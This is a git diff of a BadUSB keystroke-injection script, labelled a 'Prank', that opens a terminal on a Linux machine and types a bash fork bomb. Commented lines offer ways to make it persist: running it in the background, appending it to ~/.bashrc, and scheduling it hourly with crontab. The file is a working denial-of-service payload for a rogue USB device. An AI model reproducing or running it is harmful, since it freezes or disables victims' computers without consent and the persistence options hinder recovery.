diff --git a/BadUSB/ForkBomb-Linux.txt b/BadUSB/ForkBomb-Linux.txt index 6abdee447..6ecee34ce 100644 --- a/BadUSB/ForkBomb-Linux.txt +++ b/BadUSB/ForkBomb-Linux.txt @@ -1,9 +1,22 @@ -REM ForkBomb-Linux -REM By 7h30th3r0n3 -GUI r +REM Title: Terminal forkbomb +REM Author: FalsePhilosopher +REM Target: Unix-like tested on kubuntu 22.04. +REM Props: Hak5, 7h30th3r0n3 for the initial submission of a simpler version of drapl0n's terminalbomb script, UberGuidoZ for keeping the flipper repo going. +REM Version: 1.0 +REM Category: Prank +REM Launches terminal and spawns a terminal forkbomb +REM DELAY 300 -STRING terminal -ENTER +REM Minimize all windows as that ensures launch happens smoother. +WINDOWS d DELAY 300 -STRING :(){:|:&};: +CTRL-ALT t +DELAY 2000 +STRING :(){ :|:& };: ENTER +REM If you want to do it in the background so you can close the terminal with adding ALT F4 +REM STRING nohup :(){ :|:& };: >> /dev/null & +REM if you want to do it every time they open a terminal like drapl0n's terminalbomb style +REM STRING echo ":(){ :|:& };:" >> ~/.bashrc +REM if you want to make it happen every hour +REM STRING crontab -l | sed "\$a\@hourly sh :(){ :|:& };:" | crontab -